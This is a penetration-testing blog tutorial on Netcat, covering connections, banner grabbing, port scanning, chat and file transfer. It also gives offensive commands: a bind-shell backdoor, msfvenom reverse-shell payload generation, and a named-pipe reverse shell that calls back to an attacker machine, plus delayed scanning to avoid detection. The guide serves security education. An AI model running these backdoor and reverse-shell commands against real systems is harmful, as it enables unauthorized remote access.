This article will provide you with the basic guide of Netcat and how to get a session from it using different methods.
Table of Contents:
- Introduction
- Features
- Getting start with NC
- Connecting to a Server
- Fetching HTTP header
- Chatting
- Creating a Backdoor
- Verbose Mode
- Save Output to Disk
- Port Scanning
- TCP Delay Scan
- UDP Scan
- Reverse TCP Shell Exploitation
- Randomize Port
- File Transfer
- Reverse Netcat Shell Exploitation
- Banner grabbing
Introduction to Netcat
Netcat or nc is a utility tool that uses TCP and UDP connections to read and write in a network. It can be used for both attacking and security. In the case of attacking, it can be driven by scripts which makes it quite dependable back-end. and if we talk about security, it helps us to debug the network along with investing it.
Features
- Act as a simple TCP/UDP/SCTP/SSL client for interacting with web servers, telnet servers, mail servers, and other TCP/IP network services. Often the best way to understand a service (for fixing problems, finding security flaws, or testing custom commands) is to interact with it using Netcat. This lets you control every character sent and view the raw, unfiltered responses.
- Redirect or proxy TCP/UDP/SCTP traffic to other ports or hosts. This can be done using simple redirection (everything sent to a port is automatically relayed somewhere else you specify in advance) or by acting as a SOCKS or HTTP proxy so clients specify their own destinations. In client mode, Netcat can connect to destinations through a chain of anonymous or authenticated proxies.
- Run on all major operating systems. We distribute Linux, Windows, and Mac OS X binaries, and Netcat compiles on most other systems. A trusted tool must be available whenever you need it, no matter what computer you’re using.
- Encrypt communication with SSL, and transport it over IPv4 or IPv6.
- Act as a network gateway for execution of system commands, with I/O redirected to the network. It was designed to work like the Unix utility cat, but for the network.
- Act as a connection broker, allowing two (or far more) clients to connect to each other through a third (brokering) server. This enables multiple machines hidden behind NAT gateways to communicate with each other, and also enables the simple Netcat chat mode.
Getting start with NC
To start NC, the most basic option we can use the help command. This will show us all the options that we can use with Netcat. The help command is the following one :
nc -h
Connecting to a Server
Here, we have connected FTP Server with the IP Address 192.168.1.6. To connect to the server at a specific port where a particular service running. In our case, the port is 21 i.e. FTP.
Syntax: nc [Target IP Address] [Target Port]
nc 192.168.1.6 21
As we can see in the given image, we have vsFTPd installed on the server, and after giving the Login credentials we have successfully logged in the FTP Server.
Fetching HTTP header
We can use netcat to fetch information about any webserver. Let’s get back to the server we connected to earlier. It also has HTTP service running on port 80. So, we connected to HTTP service using netcat as we did earlier. Now after connecting to the server, we use the option that will give us the header along with the source code of the HTTP service running on the remote server.
nc 192.168.1.6 80 HEAD/HTTP/1.0
As we can see in the given image that the header and source code is displayed through the netcat connection.
Chatting
Netcat can also be used to chat between two users. We need to establish a connection before chatting. To do this we are going to need two devices. One will play the role of initiator and one will be a listener to start the conversation and so once the connection is established, communication can be done from both ends. Here we are going to create a scenario of chatting between two users with the different operating system.
User 1
OS: Windows 10
IP Address: 192.168.1.4
Role: Listener
User 2
OS: Kali Linux
IP Address: 192.168.1.35
Role: Initiator
Now in each and every scenario, regarding netcat. This step is prominent. First, we will have to create a listener. We will use the following command to create a listener:
nc -lvvp 4444
where,
[-l]: Listen Mode
[vv]: Verbose Mode {It can be used once, but we use twice to be more verbose}
[p]: Local Port
Now, it’s time to create an initiator, for this we will just provide the IP Address of the System where we started the Listener followed by the port number.
NOTE: Use the same port to create an initiator which was used in creating listener
nc 192.168.1.4 4444
Creating a Backdoor
We can also create a backdoor using NC. To create a backdoor on the target system that we can come back to at any time. Command for attacking a Linux System.
nc -l -p 2222 -e /bin/bash
This will open a listener on the system that will pipe the command shell or the Linux bash shell to the connecting system.
nc 192.168.1.35 2222
Verbose Mode
In netcat, Verbose is a mode which can be initiated using [-v] parameter. Now verbose mode generates extended information. Basically, we will connect to a server using netcat two times to see the difference between normal and verbose mode. In the image given below, we can see that when we add [-v] to the netcat command it displays the information about the process that its performance while connecting to the server.
nc 192.168.1.6 21 -v
Save Output to Disk
For the purpose of the record maintenance, better readability and future references, we will save the output of the Netcat. To do this we will use the parameter -o of the Netcat to save the output in the text file.
nc 192.168.1.6 21 -v -o /root/output.txt
Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file or not. In this case, our location for output is /root /output.txt.
Port Scanning
Netcat can be used as a port scanner although it was not designed to function as one. To work as a port scanner, we use the [-z] parameter. It tells netcat to scan listing daemon without sending any data. This makes it possible for netcat to understand the type of service that is running on that specific port. Netcat can perform TCP and UDP scan.
TCP Scan
nc -v -n -z -w 2 192.168.1.6 21-1100
Here,
- [-v]: indicates Verbose mode
- [-n]: indicates numeric-only IP addresses
- [-z]: indicates zero -I/O mode [used for scanning]
- [-w]: indicates timeout for connects and final net reads
Also, to perform a port scan netcat needs a range of port numbers. We can provide a range of ports to scan.
From the given image we can see that the target machine has lots of ports open with various services running on them.
nc -v -n -z -w 2 192.168.1.6 21-1100
TCP Delay Scan
In order to not to be noisy in an environment, it is recommended to use a delayed scan. Now to perform a delayed scan, we need to specify the delay. We will use the [-i] parameter to specify the delay in sending the next packet in seconds.
nc -z -v -i 10 192.168.1.6 21-80
UDP Scan
Netcat can scan the UDP ports in a similar way it scanned the TCP ports. We are going to use [-u] parameter to invoke the UDP mode.
nc -vzu 192.168.1.6 80-90
Reverse TCP Shell Exploitation
We can exploit a system using a combination of msfvenom and netcat. We will use msfvenom to create a payload and netcat to listen for the session. Firstly, we will have to create a payload.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.35 lport=2124 -f exe > /root/Desktop/1.exe
We are using the shell_reverse_tcp payload to get a session. We have provided with Local IP address and port and then exported the script inside an Executable(exe) file. Now we will create a listener using netcat on the port we provided during the payload creation. We will now have to send the payload file to the target. When the target will run the executable file, we will get a session on our netcat listener.
nc -lvvp 2124
Randomize Port
If we can’t decide our very own port to start listener or establish our Netcat connection. Well, netcat has a special -r parameter for us which gives us randomize local port.
nc -lv -r
File Transfer
Netcat can be used to transfer the file across devices. Here we will create a scenario where we will transfer a file from a windows system to Kali Linux system. To send the file from the Windows, we will use the following command.
nc -v -w 30 -p 8888 -l < C:\netcat\output.txt
Now we will have to receive the file shared on Kali Linux. Here we will provide netcat with the Windows IP Address and the port which hosts the file. And write the output inside a text file. For doing this we will use the following command:
nc -v -w 2 192.168.1.4 8888 > output.txt
Reverse Netcat Shell Exploitation
We will use msfvenom to create a payload and netcat to listen for the session. Firstly, we will have to create a payload.
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.35 lport=6666 R
So, when you execute the above command; you will get another command that has to be run in the target system, as shown in the image below, you will have your session as shown in the image above.
Another way to have a reverse shell is by executing the following command in the target system :
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 192.168.1.35443 1>/tmp/backpipe
And then when you start netcat as shown in the image below, you will have a session.
Banner Grabbing
To grab the target port banner from netcat, use the following command :
nc -v 192.168.1.2 22
So, this was a basic guide to netcat. It’s quite an interesting tool to use as well as it is pretty easy.
Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here
The post Comprehensive Guide on Netcat appeared first on Hacking Articles.